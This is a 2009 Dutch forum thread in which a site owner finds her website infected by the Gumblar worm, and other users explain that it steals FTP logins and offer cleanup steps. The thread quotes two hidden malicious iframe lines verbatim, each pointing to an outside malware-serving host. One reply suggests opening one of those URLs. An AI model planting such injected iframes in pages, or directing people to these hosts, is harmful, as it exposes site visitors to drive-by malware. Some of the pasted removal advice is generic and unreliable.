abonnement Unibet Coolblue Bitvavo
pi_71749568
Sinds vandaag doet mijn website raar! Hij staat in mn sig maar hij heeft dus een virus!

Vanochtend wilde ik een foto van mn website linken, maar de betreffende simpleviewer-gallery deed het niet. Er stond dat ik Macromedia flash moest downloaden of doorklikken naar de gallery. Beide opties geprobeerd en het hielp allebei niet.

Daarna kreeg ik ineens meldingen van mijn virusscanner (avast) dat er een worm/virus op mijn site zit.
File name: http://fotoleonie.nl/\{gzip}
Mailware name: HTML:Iframe-inf
Malware type: Virus/worm.

Dus

Als ik mn website bezoek (met de virusscanner uit, ja niet zo slim misschien achteraf) ziet ie er helemaal raar uit, beginplaatje is weg, links openen in nieuwe tab enzo...

Ik kijk net in de bron van mn site en er staat een regel die ik niet ken:

1<iframe data-src="http://zdlz.in:8080/index.php" style="visibility:hidden;" width=118 height=147 style="visibility: hidden"></iframe>



Zou dit het probleem zijn? En zo ja, hoe komt dat op mijn site?

[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 12:36:38 ]
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  maandag 10 augustus 2009 @ 00:58:57 #2
178193 Juicyhil
Bekende FOK!ker
pi_71749714
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?

Hij klaagt namelijk wel over een iframe
Op dinsdag 9 augustus 2011 23:01 schreef SuperrrTuxxx het volgende:
Ik hou zoveel van jou, ik doe alles voor je! O+
pi_71749805
quote:
Op maandag 10 augustus 2009 @ 00:58 schreef Juicyhil het volgende:
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?

Hij klaagt namelijk wel over een iframe
Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks.
quote:
Op maandag 10 augustus 2009 @ 00:59 schreef mistermaniac het volgende:
Je bent niet de enige:

Vreemd virus op mijn website?
IP's blokkeren op ftp server

Joomla als CMS?
Argh
Ik lees het eerste topic en ik moet bijna janken
Gadverdamme

Nee, geen Joomla trouwens, een vriend heeft de website gemaakt in Dreamweaver en ik heb vorige week wat gewijzigd in Nvu.
Een vriendin met hetzelfde hostingbedrijf heeft hetzelfde probleem trouwens, dus het lijkt erop dat dit:
quote:
Op maandag 13 juli 2009 @ 20:42 schreef AquaMaryn het volgende:


Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
misschien het probleem kan zijn
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71750128
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71750264
lijkt op een of andere hacker.....
Vooral dat wat hier boven staat.
  maandag 10 augustus 2009 @ 12:48:36 #7
79166 Qwea
#teampindakaas #viesdik
pi_71757552
ha! Jij ook al. Zoals in de SC al zei ben je besmet met een virus. Of iig een computer is besmet waarop je inlogt naar je ftp. Dat virus jat je ftp gegevens en dmv een script worden die kut iframes erin gepropt MM had er ook last van.

Mac gescant, geen virus. Dus dan kan het enkel de pc op zn werk zijn. ww veranderd, en tot nu toe niet weer gehad. Maar het is mooi kut, want het jat ALLE ftp gegevens.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71758583
Ja, echt een kutvirus
Maar het lijkt nu weg te zijn
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71759819
Gumblar virus!

Veel last van hier (ISP) ff je FTP gegevens wijzigen..
  maandag 10 augustus 2009 @ 14:07:33 #10
79166 Qwea
#teampindakaas #viesdik
pi_71760085
quote:
Op maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!

Veel last van hier (ISP) ff je FTP gegevens wijzigen..
Dat gaat dus enkel werken als je ook het virus verwijderd anders dan blijft het terug komen.

-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71761181
Dat spreekt voor zich.. Computer cleanen, iframes verwijderen, FTP gegevens wijzigen..
pi_71778251
Het virus is terug

Nou, morgen alle stappen maar weer volgen
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 10:09:42 #13
79166 Qwea
#teampindakaas #viesdik
pi_71782838
Alles van je server pleuren, je backup helemaal nakijken. Dat virus verwijderen met avast (ik las zelfs dat meestal enkel formatten helpt ), je backup terug zetten, je ftp wachtwoord wijzigen.

Hier gelukkig geen virus aangetroffen, dus de ellende van het verwijderen/formatten hebben we niet gehad.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784195
Format? Neeeeeeeeeeeeeeeeeeeee!
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:28:45 #15
79166 Qwea
#teampindakaas #viesdik
pi_71784588
quote:
Op dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!
Ik las het op 3 websites. Te belachelijk ook
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
  dinsdag 11 augustus 2009 @ 11:30:07 #16
79166 Qwea
#teampindakaas #viesdik
pi_71784628
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:

1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)

2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.

3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.

4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.

ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784638
Argh

Ik zit nu dus weer te scannen, maar avast heeft voorlopig nog niks gevonden. Misschien een andere virusscanner proberen.

Ik weiger vooralsnog te formatteren
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71784701
quote:
Op dinsdag 11 augustus 2009 @ 11:30 schreef Qwea het volgende:
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:

1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)

2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.

3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.

4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.

ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
Oh, dit ga ik zo wel even doen dan.
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:35:56 #19
79166 Qwea
#teampindakaas #viesdik
pi_71784765
ik ben wel benieuwd als er wat gevonden wordt, wat het dan precies is.. MB.

En als avast niks vindt, probeer dan eens de online scan van mcafee ofzo
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
  dinsdag 11 augustus 2009 @ 11:38:16 #20
79166 Qwea
#teampindakaas #viesdik
pi_71784837
nog een stukje
quote:
Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.

On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).

When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
quote:
To remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.

To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."

Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784948
Avast heeft vannacht gescand, maar hij is (weer ) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!

Ja, we hebben idd een netwerk Yay.
quote:
Op dinsdag 11 augustus 2009 @ 11:38 schreef Qwea het volgende:
nog een stukje
[..]

Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
Oh dit wordt een dagtaak
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:42:55 #22
79166 Qwea
#teampindakaas #viesdik
pi_71784974
quote:
Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer ) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!

Ja, we hebben idd een netwerk Yay.
[..]

Oh dit wordt een dagtaak
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785067
quote:
Op dinsdag 11 augustus 2009 @ 11:42 schreef Qwea het volgende:

[..]

Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
Ja, dat ga ik zo maar doen.

Naja, Re heeft 1 vd laptops mee naar zn werk Ik zal hem even bellen
Gebeld: hij is ook geinfecteerd

[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 11:58:59 ]
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 12:01:11 #24
79166 Qwea
#teampindakaas #viesdik
pi_71785527
quote:
Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:

[..]

Ja, dat ga ik zo maar doen.

Naja, Re heeft 1 vd laptops mee naar zn werk Ik zal hem even bellen
Gebeld: hij is ook geinfecteerd
Heeft hij die laptop ook op het bedrijsnetwerk aangesloten? Dan mogen ze wel snel actie ondernemen
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785561
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
abonnement Unibet Coolblue Bitvavo
Forum Opties
Forumhop:
Hop naar:
(afkorting, bv 'KLB')